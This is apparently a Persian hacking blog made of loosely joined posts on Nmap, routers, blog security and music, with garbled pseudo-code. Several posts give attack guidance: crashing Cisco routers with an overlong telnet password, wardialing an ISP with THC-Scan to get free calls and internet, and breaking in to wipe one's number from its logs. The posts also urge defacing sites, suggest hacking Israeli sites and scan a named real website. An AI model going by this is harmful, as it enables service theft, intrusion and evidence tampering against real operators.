را راه اندازي مجدد مي‌كنيد فايل اجرا خواهد شد.

Nmap مخفف Network Mapper میباشد و یک نرم افزار کاربردی برای جستجوی شبکه یا ممیزی امنیتی شبکه به شمار میاید. این نرم افزار طوری طراحی شده که شبکه های بزرگ را به سرعت اسکن کند، اگر چه می تواند بر روی سیستم های تنها نیز بخوبی کار کند. Nmap از ip packet های خام بصورت منحصر بفرد استفاده می کند تا تعیین کند چه رایانه هایی (hosts) بر روی شبکه در دسترس می باشند، چه سرویسهایی (ports) ارائه می کنند، چه سیستم عاملهایی (بهمراه نسخهٔ سیستم عامل) بر روی آنها در حال اجرا می باشد، چه نوع packet filter ها / فایروالهایی مورد استفاده قرار گرفته و چندین پارامتر دیگر. Nmap بر روی اکثر رایانه ها، هم گرافیکی و هم کنسول ها قابل استفاده است. Nmap یک نرم افزار مجانی است که به همراه کدهای آن تحت واژهٔ GNU GPL در دسترس می باشد.

● ویژگیهای Nmap
▪ انعطاف پذیری
از چندین تکنیک پیشرفته برای استخراج نقشهٔ شبکه استفاده می کند که این نقشه از IP filter ها، فایروالها، مسیریابها و دیگر موانع تشکیل شده است. این نقشه همچنین شامل بسیاری از پورتهای اسکن شده ( هم TCP و هم UDP)، تشخیص سیستم عامل، ping sweep ها و عوامل دیگر می باشد.

▪ قدرتمندی
از Nmap جهت اسکن کردن شبکه های بسیار بزرگ به معنی واقعی کلمه، یعنی صدها هزار از ماشین، استفاده شده است.

▪ قابلیت حمل
بر روی اکثر سیستم عاملها استفاده می شود و از آن پشتیبانی می کنند. این سیستم عاملها شامل Linux ، Open/Free/Net BSD ، Solaris ، IRIX ، Mac OS ، HP-UX ، Sun OS و غیره می باشد.

▪ سادگی
در ضمن اینکه Nmap یک مجموعه از خصوصیات پیشرفته را برای کاربران توانمند ارئه می دهد، شما می توانید استفاده از آن را با دستور “nmap –O –sS targethost” آغاز نمایید. هم نسخه های command line و هم نسخه های گرافیکی (GUI) بر اساس نیاز شما در دسترس می باشد. نسخهٔ باینری نیز برای برای کسانی که مایل به کامپایل کردن کدهای Nmap نیستند موجود می باشد.

▪ رایگان
هدف اولیه از پروژهٔ Nmap جهت کمک به امن کردن بیشتر اینترنت و تجهیز مدیران شبکه / ممیزین شبکه (auditors) / هکرها به یک ابزار پیشرفته جهت جستجوی شبکهٔ تحت کنترلشان بوده است. Nmap برای download رایگان به همراه کدهای کامل آن که شما می توانید آنها را تغییر دهید و تحت GNU General Public License (GPL) در اختیار دیگران قرار دهید، در دسترس می باشد.

▪ خوب مستند سازی شده
بیشترین تلاش صورت گرفته تا مستندات و manual page ها به روز و قابل فهم باشد. همچنین این مستندات و manual page ها به چندین زبان موجود می باشند.

▪ تحت پشتیبانی:
اگرچه این نرم افزار هیچ ضمانتی ندارد، شما می توانید اگر با مشکلی مواجه شدید به آدرس [email]fyodor@insecure.org[/email] ایمیل بزنید.

▪ تائید شده
Nmap جوایز بسیاری برده است، مثل “Information Security Product of the Year” از طرف World and Codetalker Digest.

▪ مشهور
همه روزه هزاران نفر از مردم Nmap را download می کنند و این نرم افزار با بسیاری از سیستم عاملها کار میکند.

▪ روش عملکرد Nmap
در این قسمت به توضیح عملکرد نرم افزار Nmap تحت سیستم عامل Linux می پردازیم و سپس به توضیح سوئیچ های Nmap که بصورت command line می باشند می پردازیم:
همانطور که گفته شد Nmap یک نرم افزار امنیتی می باشد که تعداد زیادی از تکنیکهای اسکن را پشتیبانی می کند:
UDP ، TCP connect() ، TCP SYN (half open) ، FTP proxy (bounce attack) ، Reverse-ident ، ICMP (ping sweep) ، FIN ، ACK sweep ، Xmas Tree ، SIN sweep ، IP Protocol و Null scan .

همچنین Nmap دارای بسیاری از قابلیتهای پیشرفته نظیر شناسایی OS با استفاده از TCP/IP ، اسکن نامحسوس (stealth scanning) ، محاسبات تاخیر دینامیکی و انتقال مجدد (retarnsmission) ، اسکن موازی، شناسایی سیستم های خاموش (down hosts) از طریق ping های موازی، decoy scanning ، شناسایی پورتهای ***** شده ، direct (non-portmapper) RPC scanning ، fragmentation scanning و همچنین تعیین پورت و هدف منعطف می باشد.

حداکثر تلاشها صورت گرفته تا کارایی Nmap برای کاربرانی که از امتیاز root برخودار نیستند، کاهش نیابد. متاسفانه بسیاری از واسطهای kernel های حساس (مثل سوکتهای خام [raw sockets]) نیاز به مجوز root دارند. هر زمان که ممکن است Nmap باید تحت مجوز root راه اندازی شود (البته نه بعنوان setuid root).
نتیجهٔ اجرای Nmap معمولاً یک لیست از پورتهای جالب (در صورت وجود) از ماشین یا ماشینهایی که اسکن شده اند، می باشد. همیشه Nmap در مورد پورت شناخته شده (“well known”port) نام سرویس (در صورت وجود)، نام، وضعیت و پروتکل را می دهد. وضعیت (state) می تواند ‘open’ ، ‘filtered’ یا ‘unfiltered’ باشد. ‘open’ یعنی ماشین مورد نظر ارتباطات روی آن پورت را connect() خواهد کرد. ‘filtered’ یعنی یک فایروال / ***** یا دیگر موانع موجود بر روی شبکه، پورت را پوشش می دهد و مانع آن می شود که Nmap تعیین کند که پورت باز است یا بسته. ‘unfiltered’ یعنی آن پورتی که توسط Nmap شناسایی شده، بسته شده و بنظر می رسد هیچ فایروالی / فیلتری به تلاش Nmap برای تعیین وضعیت آن پورت توجه ندارد. مواجه شدن با پورتهای ‘unfiltered’ متداول می باشند و زمانی این وضعیتها نشان داده می شوند که اکثر پورتهای اسکن شده در وضعیت ‘filtered’ باشند.

بسته به سوئیچهای استفاده شده، Nmap می تواند مشخصات زیر را در remote host معین کند: سیستم عامل مورد استفاده، TCP sequencability ، نام کاربرانی که برنامه های منحصر به هر پورت را اجرا می کنند، نام DNS ، تعیین اینکه آیا میزبان یک smurf address می باشد و چند مشخصهٔ دیگر.

۱) همچنین Nmap دارای بسیاری از قابلیتهای پیشرفته نظیر موارد زیر میباشد:
۲) شناسایی OS با استفاده از TCP/IP
۳) اسکن نامحسوس (stealth scanning)
۴) محاسبات تاخیر دینامیکی و انتقال مجدد (retarnsmission)
۵) اسکن موازی
۶) شناسایی سیستم های خاموش (down hosts) از طریق ping های موازی
۷) decoy scanning
۸) شناسایی پورتهای ***** شده
۹) direct (non-portmapper) RPC scanning
۱۰) fragmentation scanning

حداکثر تلاشها صورت گرفته تا کارایی Nmap برای کاربرانی که از امتیاز root برخودار نیستند، کاهش نیابد. متاسفانه بسیاری از واسطهای kernel های حساس (مثل سوکتهای خام [raw sockets]) نیاز به مجوز root دارند. هر زمان که ممکن است Nmap باید تحت مجوز root راه اندازی شود (البته نه بعنوان setuid root).
نتیجهٔ اجرای Nmap معمولاً یک لیست از پورتهای جالب (در صورت وجود) از ماشین یا ماشینهایی که اسکن شده اند، می باشد. همیشه Nmap در مورد پورت شناخته شده

(“well known”port) نام سرویس (در صورت وجود)، نام، وضعیت و پروتکل را می دهد. وضعیت (state) می تواند ‘open’ ، ‘filtered’ یا ‘unfiltered’ باشد. ‘open’ یعنی ماشین مورد نظر ارتباطات روی آن پورت را connect() خواهد کرد. ‘filtered’ یعنی یک فایروال / ***** یا دیگر موانع موجود بر روی شبکه، پورت را پوشش می دهد و مانع آن می شود که Nmap تعیین کند که پورت باز است یا بسته. ‘unfiltered’ یعنی آن پورتی که توسط Nmap شناسایی شده، بسته شده و بنظر می رسد هیچ فایروالی / فیلتری به تلاش Nmap برای تعیین وضعیت آن پورت توجه ندارد. مواجه شدن با پورتهای ‘unfiltered’ متداول می باشند و زمانی این وضعیتها نشان داده می شوند که اکثر پورتهای اسکن شده در وضعیت ‘filtered’ باشند.

بسته به سوئیچهای استفاده شده، Nmap می تواند مشخصات زیر را در remote host معین کند: سیستم عامل مورد استفاده، TCP sequencability ، نام کاربرانی که برنامه های منحصر به هر پورت را اجرا می کنند، نام DNS ، تعیین اینکه آیا میزبان یک smurf address می باشد و چند مشخصهٔ دیگر.

منبع:آفتاب
لینک دانلود :

http://www.filebuzz.com/files/free_network_mapper/1.html

با سلام

من دوباره برگشتم

البته هنوز اون مشکلاتی که به خاطرش نزدیگ به ۸ - ۹ ماه آپ نکردم باقیند اما داره یواش یواش حل میشه

البته شاید دیر به دیر بتونم آپ کنم اما مطمین باشید که دیگه کنار نمیکشم

برای حل شدنه مشکلم دعا کنید

سلام

تبریک                                                                         تبریک                                                                     تبریک

فقط اومدم قبول شدن یکی از دوستام و تو دانشگاه تبریک بگم ( خودش میدونه کیه !!! )

باور کن که وقتی خبر قبول شدنت رو شنیدم خیلی خوشحال شدم

بدون که هنوزم به یادتم و هیچوقت از یادم نمیری خیلی سعی کردم فراموشت کنم اما نتونستم ( اما خوب خودت خواستی که دیگه با هم ارطباطی نداشته باشیم )

راستی من هنوز هم پسورد آی دیم رو عوض نکردم

یه بنده خدایی : اما من تا آخر عمرم پسورد آی دیم رو عوض نمیکنم

انشالا موفق باشی   kIsS_mE

راستی اینو به همه دوستام و کسانی که به وبلاگم سر میزدند بگم که به خاطر یک سری مسایل نتونستم یه چند ماهی آپ کنم ( البته خیلی از دوستام دلیلشو میدونند )

اما انشالا مشکلاتم داره حل میشه و به زودی دوباره آموزش ها رو به بهترین نحو ممکن ادامه میدم

برای حل شدن مشکلم دعا کنید

باز هم قبول شدن دوستم رو تو دانشگاه بهش تبریک میگم

AmIn

سلام به همه

متاسفانه من تا چند ماه دیگه نمیتونم آپ کنم

چون که برای تکمیل دوره های هکینگ به مجبور شدم به تهران برم

راستی جواب آقا مجتبی :

کد قالب وبلاگت رو کاملا پاک کن بد دوباره کد رو آپ کن

یکی هم پسورد وبلاگت رو داره پسوردش و عوض کن و به هیچکسی هم ندش

چون که یکی تونسته با داشتن پسوردت کد عوض شدن وبلاگ رو تو کد قالبت بریزه

چون که دیگه من آپ نمیکنم برای اطمینان این هم بگم که با عوض کردن کد قالبت مطالب و نظرهای وبلاگت سر جاش میمونه

بای تا های

سلام امروز میخام براتون چند تا مقاله توپ بزارم

این که مقاله طریقه هک شدن بانک تجارته یکم مباحث تو این مقاله پیچیده و گیج کننده ست البته برای تازه کار ها

این هم مبحث کامل و پیچیده تلنت

این یکی درباره یکی از گروه های بزرگ هکری است اما همونطور که گفتم دنبال الگو برای خود نباشید سعی کنید خودتون مبتکر و الگو برای دیگران باشید چون اگه دنبال الگو برای خود باشید دیگه از خلاقیت و ابتکار دور میشوید

این هم معلومات کلی که یک هکر باید بداند این یکی خیلی بدردتون میخوره

تا آپ بعدی                            

یا حق

با سلام خدمت همه هکرها اعم از کلاه سفید و کلاه سیاه
اول از همه یه چند تا نکته اینجا هست که باید روشن بشه و جواب چند تا انتقاد که از من شده
اول از هر چیز آقای پویا صادقی که در پست ( هک کردن پس آی دی ) انتقاد کرده بودن که : آقا امین تو که اینقدر مطلب خوب می نویسی چرا با این پست کاره خودتو رو خراب میکنی

من کاملا با نظر ایشون موافقم البته با نصفش چون مطالب من ایقدرها هم که ایشون میگه خوب نیست چون من هنوز یه جوجه هکرم و حالا حالا ها مونده که یه هکر بشم
هک کردن آی دی و این جور چیزا اصلاً،اصلاً و باز هم اصلاً بدرد نمیخوره
فکر کن که مثلا یه آی دی هم هک کردین خوب حالا که چی ، الان مثلا میخای چیکار کنی
از نظر من هک کردن آی دی برای شروع ( فقط برای شروع و استارت ) بد نیست البته به مدت خیلی خیلی کوتاه باشه
من خودم هم از هک کردن آی دی شروع کردم اما به مدت 1 هفته فقط و بعد رفتم دنبال کلاینت هکینگ دیدم این هم به درد نمیخوره آخر زدم تو کار وب و سرور هکینگ ( البته من یه جوجه هکر کلاه سفیدم نه سیاه ) و به شما هم پیشنهاد میکنم که یک هکر کلاه سفید باشید ( البته من خودم هم شیطونی زیاد میکنم
جواب آقای پویا صادقی : من از گذاشتن این پست قصدم فقط و فقط و فقط نشان دادن باگ بزرگ سایت بزرگ یاهو بود نه آموزش هک آی دی و از این جور بچه بازیها . شما اگه وبلاگ من و بگردی با این همه پست !!!،،،،: درباره آی دی و از این جور چیزا فقط همین یه دونه پست رو میتونید پیدا کنید و اگه وبلاگ منو بتکونی هم نمیتونی درباره بوت و هک آی دی و از این جور بچه بازیها پیدا کنید
به همین دلایل لطفاً دیگه از من درخاست آموزش هک آی دی و از این جور چیزها نکنید
اما باز هم با تشکر از انتقاد سازنده تون آقای پویا صادقی

جواب خانم سمیرا : راستی یه سوال ....چه جوری موبایلا رو هک میکنن؟
من تویه یه پست روش این کار رو گفتم اگه بگردی پیدا میکنی
پست (هک کردن موبایل ) البته باز هم من این مطلب رو برای نشون دادن باگ مخابرات پست کردم

چند پیشنهاد :
 اول اینکه اصلا دنبال هک کردن آی دی و کلاینت نرین البته من تک و توک آموزش هک کردن کلاینت رو میزارم اون هم برای نشون دادن باگها و اکسپلویت های جدید
همیشه به خاطر داشته باشید که : یه هکر خوب باید اول یه آنتی هکر خوب باشه
یه هکر خوب همیشه از محیط سیاه و سفید (سی ام دی) استفاده میکنه
جدیداً وبلاگ هک کردن رایج شده که من کاملا با این کار مخالفم ( البته در بعضی مواقع آدم و مجبور میکنند که وبلاگ هک کنه که در ادامه دلیلش و میگم ) چونکه وبلاگ یه چیز کوچک و بی ارزشیه  البته باز هم تک و توک به علت احترام به نظر بازدید کنندگان آموزش هک وبلاگ هم میزارم که تا حالا یک پست گذاشتم
به هیچ وجه سایتها یا وبلاگ های ایرانی رو ( بدون دلیل و به صورت جنون آمیز ) هک نکنید چونکه این بدبختا با هزار امید و زحمت و تلاش اومدن یه سایت راه انداختند فقط در صورت نشان دادن یا باگ روی سایتشان اونها رو هک کنید البته اول باید چند بار به اونها هشدار بدید و کاملا برایشان باگ روی سایت یا سرورشان را توضیح بدید بعد اگه قانع نشدن اون سایتها را دفیس ( فقط و فقط دفیس کنید نه به دیتابیس دست بزنید و نه خرابکاری کنید ) کنید تا اون باگ براشون آشکار بشه و قانع بشن که سایتشون آسیب پذیره
من که از گوگل هکینگ متنفرم شما رو نمیدونم
من که پیشنهاد میکنم اصلا دنبال گوگل هکینگ نرید البته باز هم برای شروع بد نیست اما به مدت خیلی خیلی کم
آخه به چه درد میخوره که گوگل یه سایت رو حاضر و آمده برات پیدا میکنه که مثلاً این سایت این باگ رو داره شما بفرما هکش کن و شما هم چند تا اکسپلویت به درد نخور به آدرس بار اضاف میکنید و لم میدی به صندلی کامپیوتر بد از چند ثانیه هم تق سایته هک شد و بعد هم الکی الکی بالا پایین میپرید که دلتون خوشه که سایت هک کردین یه هک واقعی اینه که هدف از پیش تعیین شده باشه نه شانسی گوگل براتون پیدا کنه و برای هک کردن اون هدف پدرتون در بیاد و خودتون برای اون هدف اکسپلویت بنویسید
مثل کسی که بانک تجارت رو هک کرد که من مقاله طریقه هک شدن بانک تجارت رو تو پست بالایی که همین الان میزارمش گذاشتم
به هیچ وجه از هک برای خودنمایی و کل انداختن با دیگران استفاده نکنید
همیشه از جدید ترین باگها و اکسپلویتها با خبر باشید و به موقع سیستم خودتون رو پچ کنید
یکی از بهترین سایتهایی که جدیدترین اکسپلویتها رو با پچ و توضیح منتشر میکنه
securityfocuse.com
که تو دنیا جز بهترینهاست
هیچوقت دنبال الگو برای خودتان در کار هک نباشید سعی کنید دیگران شما را الگو قرار دهند

هشدار ها :

اولاً من تا حالا از کسی یا وبلاگی به جز 2 پست کپی نکردم که اون هم منبع رو نوشتم برای همین هم خوشم نمیاد کسی از من کپی کنه
فکر هم کنم که اون قدری بلد هستم که بتونم که راست کلیک یا هایلایت کردن و در کل کپی کردن از وبلاگمو با 2 تا کد جاوا اسکریپت قفل کنم اما من به شعور بالای خانندگان وبلاگم ایمان دارم و از نظر من قفل کردن وبلاگ یه جور توهین به شعور خانندگان وبلاگه
برای همین تقاضا دارم که از وبلاگ من کپی نگیرید چون به خدا بابام در میاد تا این مطالب رو بنویسم بعد شما به راحتی میاین از وبلاگ یه کپی میگیری و میری
من دیگه کد هک شدن شخص با ورود به وبلاگ ( کد هک شدن در وبلاگ ) رو برای هیچ کس نمیفرستم
من این مطلب رو فقط برای اطلاع شما از این موضوع گذاشتم نه اینکه به صورت جنون آمیز این کد رو تو وبلاگتون بزارین و کسی که به شما اعتماد کرده و وارد وبلاگتون میشه رو هک کنین

به زودی :

من دارم یه چند تا مقاله درباره کشف حفره در برنامه ها و یا سرور و وب و یا ... و طریقه نوشتن کد های مخرب ( اکسپلویت ) برای آن حفره مینویسم
انشاالله بزودی کارشون تموم میشه و برای دانلود میزارم
بعدش هم شروع به ساختن کلیپ های آموزشی میکنم

یا حق
 

چرا هك روتر سيسكو ؟

زيرا اونا در هك كردن سرور خيلي مهم هستند يعني اگه بتونيم وارد روتر بشيم يعني سرور دود ميشه.

 پيدا كردن روتر سيسكو...

 . شما الان ip روتر را پيدا كرده ايد  

حال بايد ديد كه روي روتر فايروال است يا نه .

براي اين كار ازping و telnet استفاده مي كنيم . زماني كه از دستورping استفاده مي كنيم اگر روتر را ping كرد مي شود گفت كه روي روتر فايروال نيست و زماني كه از دستور telnet استفاده مي كنيم اگر فقط از ماه پسورد خواست مي توان گفت كه ما در روتر هستيم (اينم از اين)

روترهاي سيسكو كه از برنامه ي v 4.1 استفاده مي كنند به راحتي reboot مي شوند يه اين طريق كه به ايپي روتر تلنت كرده و يك مقدار بسيار طولاني پسورد را به جاي پسورد وارد مي كنيم مثل:

سلام بحث امروز ما درباره روترهاست

چیزی که میشه گفت در همه ISP ها وجود دارد و اگر بتونید او رو هک کنید تمام ISP دود میشه چون این مبحث زیاده من اینو تو ۲ یا سه قسمت توضیح میدم

خب میریم سر اصل مطلب :

Router چیه ؟
رو به دو دسته تقسیم میکنن :

روتر های سخت افزاری: ( که یک دستگا ه صرفآ برای ما کار routing رو انجام میده , و برای کارش هیچ احتیاجی به یه کامپیوتر نداره , بلکه خودش درست مثل یک کامپیوتر Ram,CPU,System-Board,Slot,… داره و البته سیستم عامل مخصوص به خود که به اسم IOS هم اون رو میشناسن . یه روتر سخت افزاری درست مثل یه کامپیوتر محل های برای اضافه کردن کارت های جانبی و ... رو داره .



روترهای نرم افزاری : ( که در واقع بک روترسخت افزاری شبیه-سازی شده هستن .ازنظر کارکردی عملآ کار یک روتر نرم افزاری رو میکنن ولی خیلی مزایا و کارها هست که فقط توسط یک روتر واقعی ( سخت-افزاری) قابل انجام هست ... . روترهای نرم افزاری رو همون سیستم عامل ها شبیه سازی میکنن . و در واقع میشه گفت که یک سیستم عامل رو (توسط امکاناتی که خودش بما داده , مثلآ Routing and Remote access در ویندوزهای سرور مایکروسافت . ) جوری تنظیم میکنن که کار یک روتر رو برای ما انجام بده . در یک سیستم عامل وثل ویندوز 2000 سرور , این کار به راحتی نصب 2 عدد کارت شبکه و راه-اندازی یک سرویس هست ! ولی در سیستم عاملی مثل یونیکس/لینوکس با کمی دردسر بیشتر هم همراه خواهد بود . J



کار یک Router چیه ؟
روترها همونطور که از اسمشون پیداست (Router=مسیر یاب ) کارشون مسیر یابی برای بسته ها (Packet)ی اطلاعات در شبکه هست . روتر میگرده و بطور مثال کوتاه ترین مسیر رو برای رسیدن این متن از سرور ما به کامپیوتر شما , کوتاه ترین مسیر رو از بین هزاران-هزار کامپیوتر متصل به اینترنت پیدا میکنه . البته این کار به این سادگی که شنیدین نیست و بر عکس یک کر پیچیده هست که فقط روتر ها اون کار رو بلدن , به کسی هم یادش نمیدن. J یه روتر همچنین میتونه دو شبکه مجزا رو که هر کدوم nodeهای خودشون دارن رو به هم وصل کنه .
یه روتر همچین میتونه مثلآ بصورت به Access Server عمل کنه . این اکسس سرور دقیقآ همون چیزی هست که شما وقتی شماره ISP رو میگیرید , ارتباط شما رو با سرور اونجا برقرار میکنه . IP هم که شما بعنوان Server-IP و یا Default-Gateway در گزارش IPConfig می بینید , در واقع IP همون Access Servere که یه روتر هست که به اون ابزاری ( کارت جانبی) اضافه کردن که کنترل و مدیریت مودم ها رو به عهده داره .
البته حتمآ میدونید که , این اکسس سرور نیست که به شما ip میده یا شما رو تغذیه میکنه ... .
البته این ها تنها کارهایی نیستن که یه روتر میکنه, بلکه کارهای بسیار زیاد و قابلیتهای مفید دیگری هم هستن که خارج از حوصله این متنه ... .



Router دستور کار خودش رو از کجا تهیه میکنه ؟
خوب ... . وقتی یه مدیر شبکه میخواد یه کاربر برای سرورش تعریف کنه, کامیوتری رو به شبکه اش اضاف کنه با مثلآ یه میل-سرور راه اندازی کنه , خیلی راحت میشینه پشت سرورش ( فرض میکنیم Win2000 AS) و بکمک Active-Directory service کابر جدید و کامپیوتر جدید رو به دامین (Domain) اضافه میکنه , و با نسب Exchange server میل سرورش رو هم راه میندازه .

ولی یه روتر که هیچکدام از این چیرها رو نداره... !!!! L نهایت لطفی که ممکنه جناب روتر بما کنه اینه که IOS prompt رو در اختیار ما بذاره که اون هم بصورت Text-Base هست , یعنی شما فقط با چیزی شبیه محیط Dos سر و کار دارید . حتمآ با ناراحتی تمام پیش خودتون این فکر رو میکنین که :" لعنتـــــــــی ... باید بشینم همه چی رو دونه دونه و با زیر-رو کردن قسمت های مختلف و زمخت و خشک ISO , وارد کنم ... " .

خوب این هم روشی هست واسه خودش . ولی احمقانه ترین کاری هست که یه admin ممکه انجام بده !!!

این کار مثل این میمونه که بشینی تموم تنظیمات active-directory رو از طریق ابزارهای اغلب تحت داسmicrosoft active-directory support tools انجام بدی , اون هم از روی همون سرور !!!!!!!!!!

ولی خوشبختانه راه دیگری هم هست که اون , همونStartup-Config روتر ماست .

این startup-config فایلی هست که برای یک روتر , دقیقآ همانند یک Command.com/Autoexec.bat/Config.sys برای سیستم عامل داس عمل میکنه . البته اضافه کردن command.com به لیست این مثال بنا به دلایلی درست نیست , ولی به همون دلایل هم (بعدآ خواهید دونست چرا ... ) میشه این رو حساب کرد . بگزریم .... .

قسمت دوم انشاالله پس فردا!!!!!!!

سلام

ببخشید که باز هم این پستم هکری نیست

اما غیرت ایرانیم نذاشت از این موضوع به راحتی بگذرم

این خبر را در برنامه T.G.I.F در شبکه جهانی فارسی زبان تپش به طور کانل پخش شد

با هاتون شرط میبندم اگه فیلم این واقعه را میدیدید گریتون در میومد

شکنجه جوان دانشجوی ایرانی ( ۶ بار شوک الکتریکی دادند )

من این مطلب رو از سایت ژرف کپی پیست کردم

سلام به همگی

خسته شدم از بس هک یاد دادم امروز میخوام برای تنوع چند تا آهنگ رپ براتو بزارم

خیلی با حالن من توصیه میکنم همشون رو دانلود کنید

این یکی از ابلیسه 

این هم از حسام استپ

از بچه های اهواز

سیامک

و باز هم ابلیس

چند تا دیگه هم دارم که بعدا میزارم ( ۲ تا دیگه )

این بحث در مقوله ی هک کردن ای اس پی گنجانده می شود که ما برای این کار به یک برنامه به نام THC-Scan 2.0  احتیاج داریم که می توانید آن را از:

www.thc.infreno.tusculum.edu

دریافت کنید همچنین باید به سایت Network Solution رفته و در بالای صفحه به دنبال گزینه ی Who is بگردید و بعد از پیدا کردن آن بر روی لینک آن کلیک کنید و در بخش Domain یا در قسمت Site Name  اسم سایت مورد نظر را خود را که همان سایت ای اس پی مورد نظر خود است را بنویسید  و سپس Search کرده و در صفحه ی باز شده شماره تلفن هایی را که نمایش داده است را یادداشت کرده و به کمک نرم افزار THC-Scan 2.0 ای اس پی خود را مورد پویش قرار دهید

اگر به این شکل نتوانستید شماره تلفنی پیدا کنید می توانید به 118 تلفن کرده و از آن شماره های اداری ای اس پی خود را بگیرید و یادتان باشد که این شماره با شمار های اتصال به شبکه فرق می کند

حالا می چگونه می توانیم با نرم افزار فوق این کار را کنیم؟

بعد از اجرا کردن برنامه شماره تلفن را به آن داده  و آن شروع به سرچ می کند و پس از اتمام سرچ دوباره شماره تلفن هایی را به شما می دهد که این شماره ها همان شماره هایی هستند که می توانید با زنگ زدن به آن ها((که آموزشش را الان می دهم))به صورت رایگان به اینترنت وصل شده و یا رایگان به جایی زنگ بزنید

1.برای تلفن به خارج یا تلفن زدن رایگان به وسیله ی آن شماره تلفن ها این کارها را انجام دهید:

با تلفن معمولی یا به وسیله ی Hyper Terminal در قسمت Start-->All Programs-->Accessories-->Communication-->Hyper Terminal به آن شماره ها زنگ زده و به صورت رایگان به هر جایی تلفن بزنید

2.برای وصل شدن به اینترنت به صورت رایگان این کارها را انجام دهید:

در بخش Connection و یا همان صفحه ای که به روش Dial-up به اینترنت وصل می شوید دو قسمت Username و password  را خالی گذاشته و شماره ی پیدا شده را در قسمت Dial بنویسید و بعد به صورت رایگان به اینترنت وصل شوید

دوستان عزیز یادتان باشد حتما قبل از شروع این کار اطلاعات کاملی در مورد نحوه ی حفاطت ئ امنیت ؟آی اس پی مورد نظر خود پیدا کنید چون اگر محافظت از ای اس پی بالا باشد و شما هم مثلا به طور شانسی توانستید این کار را بکنید هنگامی که شما به آن شماره ها زنگ می زنید شماره ی شم در حافظه ی آن ای اس پی ثبت می شود و اگر آن ها شماره ی شما را پیدا کنند به راحتی می توانند علیه شما شکایت کنند البته گفتم اگر حفاظت از آن ای اس پی پایین بود می توانید یک دور کامل به ای اس پی نفوذ کرده و شماره ی خود را از حافظه ی آن پاک کنید و اگر حرفه ای هستید این کار را بکنبد و گرنه هر مشکلی که برایتان پیش آمد من هیچ مسولیتی ندارم. 

به زودی آموزش کار کردن با THC-scan رو میزارم آخه کار کردن با او یکمی سخته

یه آموزش خفن دیگه هم دادم که در ادامه مطلب بخونیدش

آموزش آپ کردن فایل سرور بر روی سیستم قربانی به صورت کاملا حرفه ای

ادامه ی مطلب ...

سلام به بازديد كنندگان محترم.اموز قصد دارم ترفندهايی به شما ياد بدهم كه 90 درصد از هك شدن وبلاگ های شما جلوگيری ميكند.و 10 درصد باقی  می ماندكه هكربايد حرفه ای باشد كه در ايران هكر حرفه ای كم پيدا ميشود.    
1-در زمان ثبت نام وبلاگ جديد در قسمت ثبت ايميل يك ايميلی تايپ كنيد كه وجود نداشته باشد.مثلا به اين صورت:
-------------------------------
welcome_2_hell_hack@amin-hacker.khorramshahr بله به اين صورت كه بنويسيد پسورد شما به هيج كجا فرستاده نميشود.وخيال شما از هك ايميل راحت ميشود.واگر اين كار را نكرديد هم اكنون به كنترل پنل خود در قسمت تنظيمات وبلاگ خود برويد ودست به كار شويد.واگر اين كار را كرديد بايد پسورد خود را حفظ يا در جای امن نگهداری كنيد واگر نه خود شما هم با مشكل مواجه ميشويد.
-------------------------------
2-برای وبلاگ خود يك نام كاربری درست كنيد ودر منزل يا كافی نت يا در مكان های عمومی با پسورد ونام كاربری مطلب پست كنيد.چون اگر فردی در همان زمان با برنامه های اسنيف كار كند يا تروجان ويا كيلاگری برروی كامپيوتر نصب باشد اطالاعات شما برای آن فرد برود آن فرد اطلاعات كاربری شما را بدست آورده وكاری نمی تواند بكند وفقط ميتواند مطلب پست كند كه شما ميتوانيد برويد مطلب را پاك كنيد و پسورد را عوض كنيد.
-------------------------------
3-UsernameوPassword وبلاگ های خود را كد شده كنيد.تا برای هكر اين گونه پسورد ها به سختی وتلاش زياد خوانده شود.برای كد دار كردن يا بايد از برنامه استفاده كنيد ويا بايد از يك ترفند كه با استفاده از Alt وماشين حساب كيبرد است استفاده كنيد.يعنی دكمه Alt رانگه داريد و تركيبی از  عددهای قسمت ماشين حساب كيبرد را فشار دهيد.

سلام

ببخشید که این مطلب هیچ ربطی به هک نداره

شما میتونید ای نرم افزار رو از ">دانلود نرم افزار ICQ برای فرستادن SMS دانلود کنید

rundocument.program.exe

download.ادرس فايل 

run.document

if(internetsource==clinetserver)

(disable.rundocument (

دیگه خدتون تا آخرشو بخونید

این هم از این

براي اين کار ابتدا رجيستري را باز مي کنيم و در آن به دنبال کليد :

Hkey_Current_User - Software - Yahoo - Pager - yurl

مي گرديم. پس از آن در پنجره اي که در سمت راست باز مي شود دو کليد از نوع رشته اي با نام هاي Chat Adurl و Conf Adurl مي سازيم (براي ساختن کليد هاي رشته اي در منوي Edit روي قسمت New کليک کرده و از منوي باز شده گزينه String Value را بر مي گزينيم ) پس از آنکه هر دو را ساختيم تک تک روي هر کدام دوبار کليک مي کنيم. در پنجره ای که باز میشود آدرس لوگوی خود را می دهیم (لینک آن را) برای این کا به این سایت مراجعه کنیدhttp://tinypic.com/ و عکس مورد نظرتان را آپلود کنید.
حالا کلید ok را میزنیمو سیستم را RESET را میزنیم تا سیستم RESET شود .حالا به روم رفته و مشاهده می کنیم که به جای تبلیغ پایین روم عکس لوگوی ما آمده است.
با تشکر از شما!!!

یه مطلب دیگه: چگونه یک بوتر بسازیم

ادامه ی مطلب ...

راستش همون طور هم كه قبلا گفته بودم من قصد داشتم كه اصلا اين برنامه رو به شما معرفي نكنم چون بعضي ها جنبه ندارند و با مستي بي حد و مرز با اين برنامه ميپرن به جون سايت هاي مردم .

نمي دونم چرا بعضي ها شعور ندارند ميرن مطالب من رو كپي مي كنند و به نام خودشون ثبت ميكنند.

راستي شايد به خاطر ستم اسرائيلي ها به مردم دنيا يك انجمن تشكيل بدم تا بريم سايتها ي اسرائيلي رو هك كنيم . اين هنوز تو احتمالات ببينم حال ميكنم يا نه به هر حال بريم سر اموزش :

WEBCHK

وقتي برنامه رو از قسمت دانلود وبلاگ دانلود كرديد و وارد برنامه شديد چند قسمت ميبينيد كه همه رو توضيح ميدم. براي اينكه بهتر بفهميد با يك مثال كار رو شروع ميكنم.

فرض مي كنيم يك سايت مثلا www.varzaneh.com  رو ميخواهيم SCAN كنيم . براي اينكار وارد قسمت Host مي شيم و ادرس سايت رو وارد ميكنيم . وقتي ادرس رو وارد كرديم . مي ريم سراغ Port كه همه ي شما حتما با اون اشنايي كامل داريد . چون پرت 80 رو به احتمال 99% هميشه باز ميزارن بزاريد 80 باشه.البته ميتونيد از پرت هاي 25 ، 110،78،144 هم استفاده كنيم . حالا هر طور كه عشقتون ميكشه ميتونيد از پرت هايي كه دادم هم استفاده كنيد.

